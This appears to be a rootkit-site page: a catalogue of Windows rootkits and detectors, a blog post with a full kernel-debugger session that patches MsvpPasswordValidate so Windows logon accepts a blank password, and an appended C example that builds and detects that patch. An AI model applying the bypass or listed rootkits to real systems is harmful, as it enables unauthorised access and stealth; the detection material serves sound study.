projects:

Hacker Defender
This is the Hacker Defender rootkit for Windows. It is more of a 'blackhat' tool than a training example, and is the most popular and widespread rootkit today.

HE4Hook
This is the Russian rootkit HE4Hook. The code is very complete.

BASIC CLASS
This is the set of basic Windows rootkits used for training purposes in the class 'Offensive Aspects of Rootkit Technology'. Good for starters.

Vanquish
Vanquish is a DLL-injection-based Romanian rootkit that hides files, folders and registry entries, and logs passwords.

NT Rootkit
The original and first public NT ROOTKIT. It has not been updated for many years but is good for ideas.

FU
The FU rootkit can hide processes, elevate process privileges, fake out the Windows Event Viewer so that the event log cannot be trusted for forensics, and even hide device drivers (NEW!). All this without any hooking.

WinlogonHijack
WinlogonHijack injects a DLL into winlogon.exe and hooks msgina.WlxLoggedOutSAS, logging every login in plaintext.

klister
klister is a simple set of utilities for Windows 2000, designed to read the internal kernel data structures in order to get reliable information about the system state (such as the list of all processes, including those "hidden" by rootkits, even by FU).

Patchfinder2
Patchfinder implements the Execution Path Analysis (EPA) technique for Windows 2000 systems. EPA is intended to detect various kernel and DLL rootkits in the system.

MyNetwork
An Ethernet bridge / VPN program for Windows.

MTDWin
A driver that identifies writable memory chips (FlashRAM / EEPROM) on the motherboard.

NTFSHider
A driver that stores data in 'bad blocks' or unallocated clusters on an IDE drive / NTFS partition.

VideoCardKit
A driver that can store executable code in a flash or EEPROM chip and submit that code to be executed by the video processor in order to patch kernel memory.

VICE
VICE - Catch hookers! VICE is a tool to find hooks.

Klog
Klog demonstrates how to use a kernel filter driver to implement a simple key logger.

NtIllusion
A portable Win32 userland rootkit for Windows 2000/XP. It uses DLL injection and API entry point rewriting to perform its stealth. This is more a proof of concept than a true hax0r tool.

AFX Rootkit 2005
This OPEN SOURCE Delphi rootkit uses code injection and hooks the Windows native API to hide processes, modules, handles, files, ports, registry keys, etc.

SInAR
A cross-architecture Solaris rootkit whose development is aimed both at increasing understanding of the Solaris OS and at showing that it is not just external threats that a Solaris admin should worry about.

Shadow Walker
Shadow Walker, as seen at Black Hat and in Phrack 63.

BootRootkit (eEye)
eEye BootRoot is a project presented at Black Hat USA 2005 by researchers Derek Soeder and Ryan Permeh, as an exploration of technology that custom boot sector code can use to subvert the Windows kernel as it loads. The eEye BootRootKit is a boot sector-b

CHAZ - Nima Bagheri
"Chaz" is a tool that allows network administrators and management to quickly and easily perform a network security audit. Chaz by "Nima Bagheri".

Clandestine File System Driver
Cfsd is a driver project for misrepresenting and protecting various aspects of the underlying file systems.

FUTo
FUTo is the successor of FU.

Windows Memory Forensic Toolkit
Windows Memory Forensic Toolkit (WMFT) is a collection of utilities intended for forensic use. WMFT can be used to perform forensic analysis of physical memory images acquired from Windows 2003/XP machines.

RAIDE
RAIDE stands for Rootkit Analysis Identification Elimination. RAIDE is a rootkit detection/removal tool.


Bypassing your testbox's login password
Aug 10 2006, 10:21 (UTC+0)
bugcheck writes: After living out of a duffle bag for 2 months now, I've finally got all my stuff back, have settled into a new apartment and finally have dev PCs again, W00h00! So this isn't the first time I have had to do this to recover an install with a forgotten password, but I figured I'd share it in case you are able to take advantage of it (thx to a friend for pointing out what function did the trick). As stupid as I am, I always pick those unique but easy to remember passwords that of course I'll never forget, use it once and shelve the image for months at a time and then, of course, forget it. In my case today it's my dev box!!! Luckily I had been using it as a test machine when I first got it, so I happened to already have a boot.ini entry to kernel debug on 1394 and of course had my laptop handy. I know there are better ways to recover a forgotten password but of course it's not as cool as this! =P It doesn't reset it but at least you can log in again...

Happy debugging,
Chris

kd> !process 0 0 winlogon.exe
PROCESS 817bb978 SessionId: 0 Cid: 0260 Peb: 7ffdc000 ParentCid: 0168
DirBase: 05e40060 ObjectTable: e148a858 HandleCount: 455.
Image: winlogon.exe

kd> .process /p /r 817bb978
Implicit process is now 817bb978
.cache forcedecodeuser done
Loading User Symbols
...................................................
kd> u msv1_0!MsvpPasswordValidate l3
msv1_0!MsvpPasswordValidate:
77c79927 ?? ???
^ Memory access error in 'u msv1_0!MsvpPasswordValidate l3'

kd> .pagein msv1_0!MsvpPasswordValidate
You need to continue execution (press 'g' ) for the pagein to be brought in. When the debugger breaks in again, the page will be present.

kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
80526da8 cc int 3

kd> u msv1_0!MsvpPasswordValidate l3
msv1_0!MsvpPasswordValidate:
77c79927 8bff mov edi,edi
77c79929 55 push ebp
77c7992a 8bec mov ebp,esp

kd> eq msv1_0!MsvpPasswordValidate cccc000cc201b0

kd> u msv1_0!MsvpPasswordValidate l3
msv1_0!MsvpPasswordValidate:
77c79927 b001 mov al,0x1
77c79929 c20c00 ret 0xc
77c7992c cc int 3

kd> ** YOU CAN NOW LOGIN WITH A BLANK PASSWORD!
kd> ** DONT BE SCREWIN WITH YOUR CO-WORKERS NOW =p

kd> g
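The kd session above overwrites the first eight bytes of msv1_0!MsvpPasswordValidate with "mov al,1 ; ret 0xc", so every password check returns TRUE. The following is an added example, not code from bugcheck's post or from any project listed on this page. It builds that patch from the stdcall stack-cleanup size (the 0xc immediate is taken from the post; it must equal the number of argument bytes the real function pops, or the caller's stack is corrupted after return), shows the little-endian qword the patch corresponds to, and then demonstrates the check a hook detector makes against it: compare the function's in-memory prologue with the same bytes from the on-disk image, and flag a function that now starts with an immediate "mov al ; ret". The eight "function" bytes are constructed here (the hot-patch prologue the post's `u` output shows, followed by made-up filler); the post's own constant leaves the eighth byte as 00, while this example pads every unused byte with int 3.

```c
/* Added example: encode the "return TRUE" prologue patch from the post and detect it
 * by cross-view comparison. Not part of the original post. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* x86 hot-patchable prologue as shown by `u`: mov edi,edi ; push ebp ; mov ebp,esp */
static const uint8_t HOTPATCH_PROLOGUE[5] = { 0x8b, 0xff, 0x55, 0x8b, 0xec };

/* Build the 8-byte patch: mov al,1 ; ret imm16 ; int 3 padding.
 * stack_bytes must match the callee's stdcall cleanup (0xc in the post). */
void build_ret_true_patch(uint16_t stack_bytes, uint8_t out[8]) {
    out[0] = 0xb0; out[1] = 0x01;              /* mov al,1  (BOOLEAN TRUE) */
    out[2] = 0xc2;                             /* ret imm16 */
    out[3] = (uint8_t)(stack_bytes & 0xff);
    out[4] = (uint8_t)(stack_bytes >> 8);
    memset(out + 5, 0xcc, 3);                  /* int 3: never executed */
}

/* Pack 8 bytes into the little-endian qword that kd's `eq` writes. */
uint64_t bytes_to_qword_le(const uint8_t b[8]) {
    uint64_t v = 0;
    for (int i = 7; i >= 0; --i) v = (v << 8) | b[i];
    return v;
}

uint64_t ret_true_patch_qword(uint16_t stack_bytes) {
    uint8_t p[8];
    build_ret_true_patch(stack_bytes, p);
    return bytes_to_qword_le(p);
}

/* Cross-view check: the first n bytes of the mapped function must equal the bytes
 * from the on-disk image (valid for a prologue with no relocated addresses). */
int prologue_patched(const uint8_t *in_memory, const uint8_t *on_disk, size_t n) {
    return memcmp(in_memory, on_disk, n) != 0;
}

/* Heuristic: a function that begins "mov al,imm8 ; ret" has been stubbed out. */
int looks_like_ret_stub(const uint8_t *code) {
    return code[0] == 0xb0 && (code[2] == 0xc2 || code[2] == 0xc3);
}

/* Constructed view of the function: disk bytes vs. bytes currently in the process. */
typedef struct { uint8_t disk[8]; uint8_t mem[8]; } func_view;

static void construct_view(func_view *v) {
    const uint8_t filler[3] = { 0x83, 0xec, 0x10 }; /* sub esp,10h: made-up filler */
    memcpy(v->disk, HOTPATCH_PROLOGUE, 5);
    memcpy(v->disk + 5, filler, 3);
    memcpy(v->mem, v->disk, 8);
}

/* Run the scenario. Returns bit0 = cross-view mismatch, bit1 = ret-stub heuristic. */
int detect(int apply_patch) {
    func_view v;
    construct_view(&v);
    if (apply_patch) build_ret_true_patch(0xc, v.mem);   /* what `eq` did in the post */
    return prologue_patched(v.mem, v.disk, 8) | (looks_like_ret_stub(v.mem) << 1);
}

int main(void) {
    printf("eq value for 'mov al,1 ; ret 0xc': %016llx\n",
           (unsigned long long)ret_true_patch_qword(0xc));
    printf("detect() before patch: %d, after patch: %d\n", detect(0), detect(1));
    return 0;
}
```

The cross-view comparison is the general form of the check; the ret-stub heuristic only catches this particular shape of patch, and a patch that jumps to attacker code instead of returning inline needs the prologue diff to be caught at all.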
